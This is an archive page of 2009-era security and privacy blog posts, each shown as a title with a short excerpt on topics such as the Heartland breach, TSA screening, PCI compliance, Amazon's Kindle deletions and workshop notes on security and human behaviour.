Quarter of a million Welsh profiles added to DNA database since 2000. [I forget who linked to this one.] CCTV in the spotlight: one crime solved for every 1,000 cameras [Via the security metrics mailing list.]

 
 

Cures versus Treatment

A relevant tale of medical survival over at The Reality-Based Community: Three years ago a 39-year-old American man arrived at the haematology clinic of Berlin’s sprawling Charité hospital. (The venerable Charité, one of the great names in the history of medicine, used to be in East Berlin, but it’s now the brand for the merged […]

 

I'm OK When The System Works – Even If It Is A False Alarm

UPDATE: @lbhuston gives us the dirty low down here: http://stateofsecurity.com/?p=766 This was a test of the emergency broadcast system. This was only a test, had this been a real change in the Threat Landscape….. You may have read in various media outlets about a little incident that happened yesterday concerning the mailing of […]

 

Visualization Friday – Back From Hiatus

Hey all, sorry it’s been so long since I put up some eye candy. Today’s posts come from the usual sources (flowing data and other various information design blogs) but I also wanted to point you to a new source of cool: http://www.informationisbeautiful.net/ So without further ado, your Visualization Friday Posts (some pertinent to the […]

 

We Live in Public

It’s opening in New York this weekend, and the New York Times has a review.

 

Perfecter than Perfect

So I’m having a conversation with a friend about caller ID blocking. And it occurs to me that my old phone with AT&T, before Cingular bought them, had this nifty feature, “show my caller-ID to people in my phone book.” Unfortunately, my current phone doesn’t have that, because Steve Jobs has declared that “Apple’s goal […]

 

What Are People Willing to Pay for Privacy?

So I was thinking about the question of the value of privacy, and it occurred to me that there may be an interesting natural experiment we can observe, and that is national security clearances in the US. For this post, I’ll assume that security clearances work for their primary purpose, which is to keep foreign […]

 

Mike Dahn Wants to NewSchool PCI

And I couldn’t agree more. Capability and Maturity Model Creation in Information Security — PS – sorry for using “NewSchool” as a verb.

 

Social network privacy study finds identity link to cookies

Quick follow up to Adam’s Monday post New on SSRN. Rob Westervelt over at SearchSecurity.com tells us about a social network privacy study finds identity link to cookies. Turns out that passing unique identifiers in referring URLs isn’t such a smart idea after all. Color me shocked. The full paper is linked to from Rob’s […]

 

Moore's Law is a Factor in This

I remember when Derek Atkins was sending mail to the cypherpunks list, looking for hosts to dedicate to cracking RSA-129. I remember when they announced that “The Magic Words are Squeamish Ossifrage.” How it took 600 people with 1,600 machines months of work and then a Bell Labs supercomputer to work through the data. I […]

 

Renaming the Blog to Emergent Chaos (II)

A little more seriously, the identity of a blog is constructed between the authors, commenters and readers, and I’m continually amazed by what emerges here. At the same time, what’s emerging is currently not very chaotic, and I’m wondering if it’s time for some mixing it up. Suggestions welcome.

 

Renaming the blog to Emergent Chaos (I)

In 2007, Artist Kristin Sue Lucas went before a judge to get a name change to…Kristin Sue Lucas. She’s put together a show called “Refresh” and one called “Before and After.” My favorite part is where the judge wrestles with the question “what happens when you change a thing to itself:” JR: And I don’t […]

 

New on SSRN

There are new papers by two law professors whose work I enjoy. I haven’t finished the first or started the second, but I figured I’d post pointers, so you’ll have something to read as we here at the Combo improvise around Cage’s 2:33. Paul Ohm has written “Broken Promises of Privacy: Responding to the Surprising Failure […]

 

Suing Into the Box

Today’s New York Times has an interesting article “A Lawsuit Tries to Get at Hackers Through the Banks They Attack” about the folks over at Unspam who are suing under the Can-Spam Act in an attempt to get the names of miscreants who have been attacking banks. More interestingly, they are hoping to force the […]

 

Entering Our Prime

Today is amazingly enough the fifth anniversary of Adam starting this blog. It’s amazing how fast time flies when things are chaotic. Seems like just yesterday Adam was doing the initial Star Wars posts. Appropriately enough the most recent in the category was just this past Saturday. Thank you to all of our readers for […]

 

What should the new czar do? (Tanji's Security Survey)

Over at Haft of the Spear, Michael Tanji asks: You are the nation’s new cyber czar/shogun/guru. You know you can’t _force _anyone to do jack, therefore you spend your time/energy trying to accomplish what three things via influence, persuasion, shame and force of will? I think it’s a fascinating question, and posted my answer over […]

 

What should the new czar do? (Tanji's Security Survey)

Over at Haft of the Spear, Michael Tanji asks: You are the nation’s new cyber czar/shogun/guru. You know you can’t _force _anyone to do jack, therefore you spend your time/energy trying to accomplish what three things via influence, persuasion, shame and force of will? My three: De-stigmatize failure. Today, we see the same failures we […]

 

Heartland/TJX/Hannaford hacker caught

I’ve been busy and haven’t had a lot of time to dig in, but Rich Mogull has some really good articles, “Heartland Hackers Caught; Answers and Questions,” and “Recent Breaches- We May Have All the Answers.” I have two questions: Were these custom attacks, or a failure to patch? Reading what’s not in the USSS/FBI […]

 

Mortman/Hutton Security-BSides & Black Hat Presentation Available

Hey y’all, happy Monday morning. I’ve put Dave & my presentation for Security BSides up on slideshare: http://www.slideshare.net/alexhutton/mortmanhutton-security-bsides-presentation Mortman/Hutton Security B-Sides Presentation View more presentations from alexhutton. Also note that this includes the Black Hat presentation we gave on the Mortman/Hutton Vulnerability/Exploit model. I hope you will enjoy! PS – There’s probably audio available for […]

 

We Live In Public, The Movie

One of the best ways to upset someone who cares about privacy is to trot out the “nothing to hide, nothing to worry about” line. It upsets me on two levels. First because it’s so very wrong, and second, because it’s hard to refute in a short quip. I think what I like most about […]

 

Spinal Tap, Copyright

There’s a cute little story in the NYTimes, “Lego Rejects a Bit Part in a Spinal Tap DVD.” I read it as I was listening to a podcast on Shepard Fairey vs The Associated Press that Dan Solove pointed out. In that podcast, Dale Cendali (the attorney representing the AP) asserts that licensing is easy, […]

 
 

Hearsay podcast: Shostack on Privacy

Dennis Fisher talks with Microsoft’s Adam Shostack about the Privacy Enhancing Technologies Symposium, the definition of privacy in today’s world and the role of technology in helping to enhance and protect that privacy. As always, a fun conversation with Dennis Fisher. Ran longer than I think either of us expected at 41:15. And speaking of […]

 
 

Heartland CEO and Outrage

Bill Brenner has an interview with Robert Carr, the CEO of Heartland. It’s headlined “Heartland CEO on Data Breach: QSAs Let Us Down.” Some smart security folks are outraged, asserting that Carr should know the difference between compliance and security, and audit and assessment. Examples include Rich Mogull’s “Open Letter to Robert Carr” and Alan […]

 

New Breach Laws

Missouri adds a law with a “risk of harm trigger” aka the full-employment provision for lawyers and consultants. Texas adds health data to their notification list. Most importantly, North Carolina requires notice to their attorney general for breaches smaller than 1,000 people. I think Proskauer here is being a little inaccurate when they characterize this […]

 

Information Security-Don't sweat it

So-called clinical-strength antiperspirants …come with instructions that they be applied before bed for “maximum” protection from wetness and odor. … Even regular-strength antiperspirants work best when applied to underarms at night, experts told us. Bedtime application “really is the best way to use an antiperspirant,” says David Pariser, M.D., president of the American Academy of […]

 

What's in a name?

Brian Jones Tamanaha has an interesting post about our database-driven society. The core of it is that English is bad at recording some names. The solution? Force people to change their official names for the convenience of the database: During public hearings on the voter identification legislation in the House, state Rep. Betty Brown, R-Terrell, […]

 
 
 

Dear $LOCALBANK That I Use

Keeping a database of all of your ATM PINs in a clear (or possibly encrypted but easily reversible) text database is not a good idea. I honestly can’t see any use value for this, especially when they won’t tell you what your PIN is even if you have multiple forms of government issued identification. No […]

 

Quantitative Analysis of Web Application Usefulness (Or Why Your ROSI is wRONG)

The amazing (in both quality and quantity of blog post production) Lori MacVittie of f5 has a blog post up on their corporate blog called,  “A Formula for Quantifying Productivity of Web Applications.” Basically, Lori proposes that we study web server processes and the time to complete them over a period of time rather than […]

 

Television, Explained

So I’m not sure if Michael Pollan’s “Out of the Kitchen, Onto the Couch” is supposed to be a movie review, but it’s definitely worth reading if you think about what you eat. I really like this line: The historical drift of cooking programs — from a genuine interest in producing food yourself to the […]

 

Is Barack Obama an American Citizen?

It might seem, to the average person, that the “Birthers” must have a tough time proving their case. After all, Barack Obama has released his Certification of Live Birth (pictured above), which meets all the requirements for proving one’s citizenship to the State Department. The authenticity of the certificate has been verified by Hawaii state […]

 

Hot Singles Are Waiting for You!

Information anyone gives to Facebook can be used by Facebook to do things Facebook wants to do. Like use your face in a personals ad. Even if Facebook knows you’re married. Facebook used Cheryl Smith’s face this way in an ad that it showed her husband. (“oops”) So go read more in Wife’s face used […]

 

ID Theft Risk Scores?

A bunch of widely read people are blogging about “MyIDscore.com Offers Free ID Theft Risk Score.” That’s Brian Krebs at the Washington Post. See also Jim Harper, “My ID Score.” First, there’s little explanation of how it’s working. I got a 240 when I didn’t give them my SSN, and my score dropped to 40 […]

 
 

To The Moon

One of the really fascinating things about listening to the streaming audio of the first moon landing is how much time was spent debugging the spacecraft, resetting this and that. As the memory fades away, Charlie Stross wrote about the difficulties in going back to the moon: Not only does the cost of putting a […]

 

Identity Theft

Remember Identity Theft isn’t getting your credit card stolen, that’s fraud. Having the records that define who you are to an entire country and determine whether you can get a relatively high paying job get stolen. That’s identity theft…

 

Penetration testing your products

It was built to be impenetrable, from its “super rugged transparent polycarbonate housing” to its intricate double-tabbed lid… Just go read the story. Anything else I say will spoil the punchline.

 

Chris, I'm sorry

I hate the overuse of URL shorteners like tinyurl. I like to be able to see what a link is before I click on it. I don’t like that these companies get to be yet another point of surveillance. (To be fair, tinyurl doesn’t seem to be taking advantage of that. I have cookies from […]

 

The Arrest of Gates

A couple of good articles are John McWhorter’s “Gates is Right–and We’re Not Post-Racial Until He’s Wrong,” and Lowry Heussler’s “Nightmare on Ware Street.” The full police report is at “Gates police report.” I think PHB’s comment on Michael Froomkin’s post is quite interesting: You are all missing a rather significant fact, this is the […]

 

Today's Privacy Loss – English Soldiers' Details Published

Demonstrating that no one’s data is safe, the names, pay records, and other personal information of 90,000 English soldiers were placed on the Internet. These soldiers, who served with King Henry V at Agincourt, now have their information listed at www.medievalsoldier.org, exposing them to the chance of identity theft after nearly 500 years. The soldiers […]

 

For epistemological anarchism

So Dave Mortman and Alex Hutton have a talk submitted to Security BSides entitled “Challenging the Epistemological Anarchist to Escape our Dark Age.” Now, it would certainly be nice if we could all use the same words to mean the same things. It would make communication so much easier! It would let us build the […]

 

July 20, 1969

The Apollo program took place at just about the right time for me. I was six (or, as I would quickly have pointed out at the time, six *and a half*) when the first lunar landing occurred, and barely ten when Apollo 17 splashed down. This was old enough to be fascinated by the technology […]

 

Color on Chrome OS

New things resemble old things at first. Moreover, people interpret new things in terms of old things. Such it is with the new Google Chrome OS. Very little I’ve seen on it seems to understand it. The main stream of commentary is comparisons to Windows and how this means that Google is in the OS […]

 

We Regret The New York Times’ Error

In “Kindling a Consumer Revolt,” I quoted the New York Times: But no, apparently the publisher changed its mind about offering an electronic edition, and apparently Amazon, whose business lives and dies by publisher happiness, caved. It electronically deleted all books by this author from people’s Kindles and credited their accounts for the price.” What […]

 

Kindle Brouhaha Isn't About DRM

In case you haven’t heard about it, there is a brouhaha about Amazon un-selling copies of two Orwell books, 1984 and Animal Farm. There has been much hand-wringing, particularly since it’s deliciously amusing that it’s Orwell. The root cause of the issue is that the version of the Orwell novels available on the Kindle […]

 

Kindling a Consumer Revolt

Well, by now it’s all over the blogo/twitter spheres, and everything that might be said has already been said about Eric Blair, a publisher and Amazon: This morning, hundreds of Amazon Kindle owners awoke to discover that books by a certain famous author had mysteriously disappeared from their e-book readers. These were books that they […]

 

Up Again

We had some expected downtime this morning. Thanks for your notes and IMs. If you’re reading this, things are now working again.

 
 

A Black Hat Sneak Preview (Part 2 of ?)

Following up on my previous post, here’s Part 2, “The Factors that Drive Probable Use”. This is the meat of our model. Follow up posts will dig deeper into Parts 1 and 2. At Black Hat we’ll be applying this model to the vulnerabilities that are going to be released at the show. But before […]

 

Not because it is easy, but because it is hard

Forty years ago today, Apollo 11 lifted off for the moon, carrying Buzz Aldrin, Neil Armstrong and Michael Collins. The Boston Globe has a great selection of photos, “Remembering Apollo 11.” (Thanks to Deb for the link.)

 

Happy Bastille Day!

It’s hard not to like a holiday which celebrates the storming of a prison and the end of a monarchy. Photo: Vytenis Benetis .

 

An Example of Our Previous Graph In Action

I wanted to throw it out here as an example of how you would use the model from my earlier post in real life. So let’s take the recently released Internet Explorer security vulnerability and see how it fits. Now this is a pretty brain-dead example and hardly requires a special tool, but I think it […]

 

Do Audit Failures Mean That Audit Fails In General?

Iang’s posts are, as a rule, really thought provoking, and his latest series is no exception. In his most recent post, How many rotten apples will spoil the barrel, he asks: So we are somewhere in-between the extremes. Some good, some bad. The question then further develops into whether the ones that are good are […]

 

Wells Fargo vs Wells Fargo

You can’t expect a bank that is dumb enough to sue itself to know why it is suing itself. Yet I could not resist asking Wells Fargo Bank NA why it filed a civil complaint against itself in a mortgage foreclosure case in Hillsborough County, Fla. “Due to state foreclosure laws, lenders are obligated to […]

 

Running from the truth

Robin Hanson has an interesting article, “Desert Errors:” His findings stayed secret until 1947, when he was allowed to publish his pioneering Physiology of Man in the Desert. It went almost entirely unnoticed. In the late 1960s, marathon runners were still advised not to drink during races and until 1977, runners in international competitions were […]

 

Business Week on Heartland

Not much to add, but a good article in Business Week on Lessons from the Data Breach at Heartland. Well worth reading…

 

Social Security Numbers are Worthless as Authenticators

The nation’s Social Security numbering system has left millions of citizens vulnerable to privacy breaches, according to researchers at Carnegie Mellon University, who for the first time have used statistical techniques to predict Social Security numbers solely from an individual’s date and location of birth. The findings, published Monday in The Proceedings of the National […]

 

A Black Hat Sneak Preview (Part 1 of ?)

Alex and I will be on a panel, A Black Hat Vulnerability Risk Assessment, at this year’s Black Hat. We’ll be discussing the need to perform a risk assessment of vulnerabilities as you become aware of them in a deeper context than just looking at the CVSS scores. Things to consider are what compensating controls […]

 

Bob Blakely on the Cybersecurity Conversation

Bob Blakely has a thought-provoking blog post which starts: The Cyberspace Policy Review says “The national dialog on cyber-security must begin today.” I agree. Let’s start the dialog with a conversation about what sacrifices we’re willing to make to get to an acceptable worst-case performance. Here are four questions to get the ball rolling: Question […]

 

Thoughts on Iran

Our love affair with the Iranian Tweetolution has worn off. The thugs declared their election valid, told their armed representatives to Sorry, next tweet: go impose some law or order or something, and it was done. Well, as it often turns out, there was more to it than fits in 140 characters, and the real […]

 

The Punch Line Goes at the End

The Black Hat conference in Las Vegas always has its share of drama. This year, it’s happened a month before the conference opens. The researcher Barnaby Jack had to cancel his talk. Risky.biz gives an account of this; his talk was to make an Automated Teller Machine spit out a “jackpot” of cash, in the […]

 

Unthinkable Foolishness from TSA

“Flying from Los Angeles to New York for a signing at Jim Hanley’s Universe Wednesday (May 13th), I was flagged at the gate for ‘extra screening’. I was subjected to not one, but two invasive searches of my person and belongings. TSA agents then ‘discovered’ the script for Unthinkable #3. They sat and read the […]

 

Voltage Predicts the Future

It’s easy to critique the recent Voltage report on breaches. (For example, “2009 started out to be a good year for hackers; in the first three months alone, there were already 132 data breaches reported.” That there were 132 breaches does not mean that hackers are having a good year; most breaches are not caused […]

 

Thanks, Jeffrey Bennett

In “Books that should be in a security manager’s library,” Jeffrey Bennett says nice things about The New School (the book) and suggests that it’s one of eight that “no professional library is complete without.” Thanks!

 

Emergent Traffic Chaos

Paul Kedrosky has an amazing video: As described in the New Scientist: Researchers from several Japanese universities managed the feat by putting 22 vehicles on a 230-metre single-lane circuit (see video). They asked drivers to cruise steadily at 30 kilometres per hour, and at first the traffic moved freely. But small fluctuations soon appeared in […]

 

More Friday Skepticism

Since Adam started it, I’ll add a link to a nice YouTube video about how to be a good skeptic h/t BoingBoing

 

Death-related items

I’m cleaning out my pending link list with a couple of morbidly-thematic links. Old-but-interesting (2007 vintage) list of relative likelihoods of death compared to dying in a terrorist attack. For example… You are 1048 times more likely to die from a car accident than from a terrorist attack You are 12 times more likely to die from […]

 

Visualization Friday & More!

OK, so this week for Visualization Friday, I’m going to point you to just one thing: At Last, a Scientific Approach to Infographics A blog post by the awesome visualization expert Stephen Few that praises: Visual Language for Designers: Principles for Creating Graphics that People Understand by Connie Malamed OK, I’ll also mention that I […]

 

Science, Skepticism and Security

Rich Mogull has a great post on “Science, Skepticism and Security” In the security industry we never lack for theories or statistics, but very few of them are based on sound scientific principles, and often they cannot withstand scientific scrutiny. For example, the historic claim that 70% of security attacks were from the “insider threat” […]

 

The Cost of Anything is the Foregone Alternative

The New York Times reports: At least six men suspected or convicted of crimes that threaten national security retained their federal aviation licenses, despite antiterrorism laws written after the attacks of Sept. 11, 2001, that required license revocation. Among them was a Libyan sentenced to 27 years in prison by a Scottish court for the […]

 

Economics of Information Security

Ross Anderson is liveblogging the 2009 Workshop on Economics of Information Security. I’m in Seattle, and thus following eagerly. It seems Bruce isn’t liveblogging this time. I know I found it challenging to be a stenographer and a participant at SHB.

 

The emergent chaos of fingerprinting at airports

HONG KONG (Reuters) – A Singapore cancer patient was held for four hours by immigration officials in the United States when they could not detect his fingerprints — which had apparently disappeared because of a drug he was taking. The incident, highlighted in the Annals of Oncology, was reported by the patient’s doctor, Tan Eng […]

 

UnClear where the data will go

So Clear’s Verified Line Jumper service has shut down. Aviation Week has a blog post, “Clear Shuts Down Registered Traveler Lanes.” Clear collected a lot of data: The information that TSA requires us to request is full legal name, other names used, Social Security number (optional), citizenship, Alien Registration Number (if applicable), current home […]

 

Iran Links

The Economist’s Bagehot writes about his idea of “The chemistry of revolution,” while admitting he’s generalizing from two. Ethan Zuckerman on “Iran, citizen media and media attention.” “Unfortunately, unlike positive online gestures of solidarity (retweeting reports from Iran, turning Twitter or Facebook pictures green), this one does little more than piss off sysadmins, helps Iranian […]

 

Ron Paul supporter inadvertently gets iPhones banned from U.S. aircraft

Via CNN: Steve Bierfeldt says the Transportation Security Administration pulled him aside for extra questioning in March. He was carrying a pocket edition of the U.S. Constitution and an iPhone capable of making audio recordings. And he used them. On a recording a TSA agent can be heard berating Bierfeldt. One sample: “You want to […]

 

Visualization Friday!

Yesterday I got to see what might have been one of the most amazing(ly bad) security dashboards I’ve ever seen. And those who have read my posts on visualization know that I find the visualization of risk & security to be a pretty fascinating field of study. So given the quality of the GRC apps […]

 

Happy Juneteenth!

Celebrate Juneteenth, but remember that we have not eliminated the scourge of slavery.

 

The Trouble With Metrics

Is that they can be gamed. See “Terror law used to stop thousands ‘just to balance racial statistics’” in the Guardian: Thousands of people are being stopped and searched by the police under their counter-terrorism powers – simply to provide a racial balance in official statistics, the government’s official anti-terror law watchdog has revealed. […]

 

Privacy Enhancing Technologies 2009

The organizers of the 9th Privacy Enhancing Technologies Symposium invite you to participate in PETS 2009, to be held at the University of Washington, Seattle, WA, USA, on Aug 5-7, 2009. PETS features leading research in a broad array of topics, with sessions on network privacy, database privacy, anonymous communication, privacy policies, and privacy offline. […]

 

Green Dam

Update 26 June 2009: The status of Green Dam’s optionality is still up in the air. See, for example, this news story on PC makers’ efforts to comply, which points out that Under the order, which was given to manufacturers in May and publicly released in early June, producers are required to pre-install Green Dam […]

 

SHB Session 6: Terror

Bill Burns (Suggested reading Decision Research: The Diffusion of Fear: Modeling Community Response to a Terrorist Strike) Response to Crisis: Perceptions, Emotions and Behaviors. Examining a set of scenarios of threats in downtown LA. Earthquake, chlorine release, dirty bomb. Earthquake: likely 100-200 casualties. Dirty bomb, expected casualties: 100 at most. Chlorine may be thousands to […]

 

SHB Session 5: Foundations

Rachel Greenstadt chaired. I’m going to try to be a little less literal in my capture, and a little more interpretive. My comments in italic. Terence Taylor, ICLS (Suggested reading: Darwinian Security; Natural Security (A Darwinian Approach to a Dangerous World)). Thinks about living with risks, rather than managing them. There are lessons from biology, […]

 

SHB Session 4: Methodology

David Livingstone Smith chaired. Angela Sasse “If you only remember one thing: write down everything the user needs to do and then write down everything the user needs to know to make the system work. Results of failure are large, hard to measure. (Errors, frustration, annoyance, impact on processes and performance, coloring user perception of […]

 

SHB Session 3: Usability

Caspar Bowden chaired session 3, on usability. Andrew Patrick NRC Canada (until Tuesday), spoke about there being two users of biometric systems: the purchaser or system operator and the subject. Argues that biometrics are being rolled out without a lot of thought for why they’re being used, when they make sense and when not. Canada […]

 

Publius Outed

The pseudonymous blogger, Publius, has been outed. Ed Whelan of the National Review outed him in what appears to be nothing more than a fit of pique at a third blogger, Ed Volokh, and Publius commented on Volokh’s criticism of Whelan, so Whelan lashed out at Publius. Or so it seems from the nosebleed bleachers […]

 

SHB Session 2: Fraud

Julie Downs studied users who were going through an email inbox full of phishing emails, while doing a talk-aloud. They also did interviews afterwards. People with incidents get very sensitive to risks, but don’t get any better at identifying phishing emails. What really helps is contextualized understanding. Do they know what a URL is? Do […]

 

SHB Session 1: Deception

Frank Stajano Understanding Victims Six principles for systems security Real systems don’t follow logic that we think about. Fraudsters understand victims really well. Working with UK TV show, “the real hustle.” Draft paper on SHB site. Principles: Distraction, social compliance, herd principle, deception, greed, dishonesty David Livingstone Smith What are we talking about? Theoretical definitions: […]

 

Security & Human Behavior

I’m at the Security & Human Behavior workshop, and will be trying to blog notes as we go. I should be clear: these notes aren’t intended to be perfect or complete. Update: Bruce Schneier is also liveblogging. intro. Ross Anderson is blogging in comments to this post.

 

Security & Human Behavior

I’m blogging the Security & Human Behavior Workshop at the New School blog. Bruce Schneier is also blogging it, as is Ross Anderson.

 

A Farewell to Bernstein

From Chandler, who is in China: Adam sent along to the authors of this blog a link to the http://www.nytimes.com/2009/06/08/business/08bernstein.html?_r=1&hpw New York Times obituary for Peter Bernstein yesterday Peter L. Bernstein, an economic historian and a widely read popularizer of the efficient market theory, which changed trading behavior on Wall Street, died Friday at NewYork-Presbyterian/Weill […]

 

Pirate Party Victory in Sweden

“Together, we have today changed the landscape of European politics. No matter how this night ends, we have changed it,” Falkvinge said. “This feels wonderful. The citizens have understood it’s time to make a difference. The older politicians have taken apart young peoples’ lifestyle, bit by bit. We do not accept that the authorities’ mass-surveillance,” […]

 

Links To Interesting Stuff

I have a ton of tabs open in Firefox about stuff I thought would be some sweet newschool-esque reading for everybody out there. 1.) Threat and Risk Mapping Analysis in Sudan Not really about measurement and progress, but a fascinating look at “physical risk management” nonetheless: http://irevolution.wordpress.com/2009/04/09/threat-and-risk-mapping-analysis-in-sudan/ 2.)  I thought Gunnar did a great job […]

 

S&P Risk Models

There was an interesting segment on NPR this morning, “Economy Got You Down? Many Blame Rating Firms” that covered amongst other things the risk model that Standard and Poors used to rate bonds and in specific mortgage backed ones. There are a few choice quotes in the story about how the organizations approached the models […]

 

The Art of Living Dangerously

I haven’t had a chance to read it, but I’ll probably pick up “Absinthe and Flamethrowers: Projects and Ruminations on the Art of Living Dangerously” at some point, if only because of the author’s writing on the relationship between risk and happiness says something I’ve always suspected, that risk takers are happier than risk avoiders […]

 

Pirates, Inc.

I found this short documentary about piracy around the Strait of Malacca, an interesting view of the reality of pirate life as a last refuge of the unemployed fisherman, to be an interesting counterpoint to the NPR Story, “Behind the Business Plan of Pirates, Inc.” which provides an altogether different view of the […]

 

Statistics Police?!

From Gelman’s blog: U.K. Sheriff Cites Officials for Serious Statistical Violations I don’t know if we need an “office” of information assurance in the government sector, but it would be nice to have some penalty on the books for folks who abuse basic common sense statistical principles. Of course, the *real* answer lies in education […]

 

TAKE PART IN PROJECT QUANT (please)!

Hey everyone.  I wanted to let you know that Rich, Adrian & Co. at Securosis are spearheading a research project  called “Quant”.  They currently have a survey up on survey monkey about Patch Management that they’d like participation in.  If you can, please give thoughtful contribution to the survey. http://www.surveymonkey.com/s.aspx?sm=SjehgbiAl3mR_2b1gauMibQw_3d_3d There’s something about a registration […]

 

Amusements with Alpha

I just saw a link to someone who had broken Wolfram Alpha. Their breaking question was, “when is 5 trillion days from now?” The broken result is: {DateString[{13689537044,5,13,16,57,18.5796},Hour12Short],:,DateString[{13689537044,5,13,16,57,18.5796},Minute],:,DateString[{13689537044,5,13,16,57,18.5796},Second], ,DateString[{13689537044,5,13,16,57,18.5796},AMPMLowerCase]} | {DateString[{13689537044,5,13,16,57,18.5796},DayName],, ,DateString[{13689537044,5,13,16,57,18.5796},MonthName], ,DateString[{13689537044,5,13,16,57,18.5796},DayShort],, ,13689537044} Which is certainly amusing. A quick check shows that even one trillion days gives a similar error. A bit of the […]

 

New Means of Pie Chart Abuse

Just for Adam, because I know he’ll *love* this. Was reading the “How to transform your ETL tool into a data quality toolkit” post on the data quality blog when I noticed something. In the graphic they’re presenting there: The.Pie.Chart.Spins. Which could be one of the most awesome data visualization abuses.  ever.

 

Voltage Security's Breach Map

The folks over at Voltage have released a really cool interactive map of breaches from around the world.  Tools like this show how important having data is, just imagine how much more impressive and useful something like this could be if more people were willing to share data about breaches or other information security issues […]

 

Open Thread

What’s on your mind? Extra points for mocking other members of the combo for not posting. Me? I’m wondering why the opening of the Parliament of South Africa involves so many bagpipes.

 

Thoughts on Bejtlich's Information Security Incident Ratings

Check out Richard Bejtlich’s Information Security Incident Rating post. In it, he establishes qualitative, color-based scales for various asset-states in relation to the aggregate threat community.  As Richard states, he’s not modeling risk, but rather he’s somewhat modeling half of risk (in FAIR terms, an attempt at TEF/LEF/TCap information, just not the loss magnitude side). […]

 

Democracy, Gunpowder, Literacy and Privacy

In an important sense, privacy is a modern invention. Medieval people had no concept of privacy. They also had no actual privacy. Nobody was ever alone. No ordinary person had private space. Houses were tiny and crowded. Everyone was embedded in a face-to-face community. Privacy, as idea and reality, is the creation of a modern […]

 

TSA Kills Bad Program!

The government is scrapping a post-Sept. 11, 2001, airport screening program because the machines did not operate as intended and cost too much to maintain. The so-called puffer machines were deployed to airports in 2004 to screen randomly selected passengers for bombs after they cleared the standard metal detectors. The machines take 17 seconds to […]

 

Web 2.0 and the Federal Government

This looks interesting, especially in light of the launch of data.gov: The Obama campaign—and now the Obama administration—blazed new trail in the use of Web 2.0 technology, featuring videos, social networking tools, and new forms of participatory and interactive technology. This event will feature government, technology, and new media leaders in addressing the special challenges […]

 

Giving Circles and de Tocqueville

There was an interesting story on NPR the other day about “giving circles.” It’s about groups of people getting together, pooling their money, investigating charities together, and then giving money. The story mentions how the increasing bureaucratization* of fund-raising leads to groups whose involvement is “I write them a cheque each year.” It also mentions […]

 

Secret Questions

Congratulations to Stuart Schechter, A. J. Bernheim Brush (Microsoft Research), Serge Egelman (Carnegie Mellon University). Their paper, “It’s No Secret. Measuring the Security and Reliability of Authentication via ‘Secret’ Questions” has been Slashdotted. It’s really good research, which Rob Lemos covered in “Are Your “Secret Questions” Too Easily Answered?”

 

Can't Win? Re-define losing the TSA Way!

We were surprised last week to see that the GAO has issued a report certifying that, “As of April 2009, TSA had generally achieved 9 of the 10 statutory conditions related to the development of the Secure Flight program and had conditionally achieved 1 condition (TSA had defined plans, but had not completed all activities […]

 

Definitions: cloudenfreude

cloudenfreude — Feeling of happiness at watching the discomfort of others, especially senior management, as they accept in aggregate for *aaS the same risks which were easily accepted piecemeal over time for the analogous service internally.

 

First International Alternative Workshop on Aggressive Computing and Security

Thinking security cannot be done without adopting a preferential mode of thought of the attacker. A system cannot be defended if we do not know how to attack it. If the theory is still an interesting approach to formalize things, the operational approach must be the ultimate goal: to talk about security is meaningless […]

 

PCI Data Available

Interesting information was made available today from VISA about PCI Compliance status for Level 1, 2, and 3 merchants.  Find it as a .pdf >>here<< (thanks to Mike Dahn for bringing it to our notice). **UPDATE** You may want to check out what Pete Lindstrom has done with that data, in his Blog Post, “Is […]

 

Richard Bejtlich's Quantum State

Is Statistically Mixed? Richard Bejtlich (whom I do admire greatly in most all of his work) just dug up a dead horse and started beating it with the shovel, and I just happen to have this baseball bat in my hands, and we seem to be entangled together on this subject, so here goes: I […]

 

Twitter Bankruptcy and Twitterfail

If you’re not familiar with the term email bankruptcy, it’s admitting publicly that you can’t handle your email, and people should just send it to you again. A few weeks ago, I had to declare twitter bankruptcy. It just became too, too much. I’ve been meaning to blog about it since, but things have just […]

 

European View on Breaches

I hadn’t seen this article by Peter Hustinx when it came out, but it’s important. He says that “All data breaches must be made public:” The good news is that Europe’s lawmakers want to make it obligatory to disclose data breaches. The bad news is that the law will not apply to everyone. Those exemptions […]

 

I wrote code for a botnet today

There’s a piece of software out there trying to cut down on blog spam, and it behaves annoyingly badly. It’s bad in a particular way that drives me up the wall. It prevents reasonable behavior, and barely blocks bad behavior of spammers. In particular, it stops all requests that lack an HTTP Referer: header. All […]

 

Camera advice bleg

I’m thinking about maybe getting a new camera. Before I say anything else let me say that I understand that sensor size and lens rule all else, and that size does matter, except when it’s megapixel count, which is a glamour for the foolish. That said, I’m off to South Africa in a few weeks, […]

 

The Eyes of Texas Are on Baseboard Management Controllers? WHAT??!!!

OR TEXAS HB1830S IS SWINEFLU LEGISLATION, IT’S BEEN INFECTED BY PORK! **UPDATE:  It looks like the “vendor language” around Section Six has been struck! Given Bejtlich’s recent promises, I thought we’d take a quick but pragmatic look at why risk assessments, even dumb, back-of-the-envelope assessments, might just be a beneficial thing. As you probably know, […]

 

Ban Whole Body Imaging

Congressman Jason Chaffetz has introduced legislation seeking a ban on Whole-Body Imaging machines installed by the Transportation Security Administration in various airports across America. Describing the method as unnecessary to securing an airplane, Congressman Chaffetz stated that the new law was to “balance the dual virtues of safety and privacy.” The TSA recently announced plans […]

 

Seattle Parking Monitoring

Seattle’s King5 TV reports on “Parking enforcement’s powerful new weapon:” An unassuming white sedan is the Seattle Police Department’s new weapon against parking violators. Just by driving down the street, George Murray, supervisor of SPD’s parking enforcement unit, can make a record of every parked car he passes. “What we’re doing here is we’re actually […]

 

Time To Patch, Patch Significance, & Types of Cloud Computing

Recently, a quote from Qualys CTO Wolfgang Kandek struck me kind of weird when I was reading Chris Hoff yet again push our hot buttons on cloud definitions and the concepts of information security survivability.  Wolfgang says (and IIRC, this was presented at Jericho in SF a couple of weeks ago, too): In five years, […]

 

Covering the Verizon Breach Report

As you probably know by now, the pattern of 1s and 0s on the cover of the 2009 Verizon Data Breach Investigations Report contains a hidden message. I decided to give it a whirl and eventually figured it out. No doubt plenty of people managed to beat me to it, as evidenced by the fact […]

 

Cybersecurity Review Turf Battle

Many at RSA commented on the lack of content in Melissa Hathaway’s RSA keynote. The Wall St Journal has an interesting article which may explain why, “Cybersecurity Review Sets Turf Battle:” President Barack Obama’s cybersecurity review has ignited turf battles inside the White House, with economic adviser Lawrence Summers weighing in to prevent what he […]

 

Scalia: Just Because You Can Doesn't Mean You Should

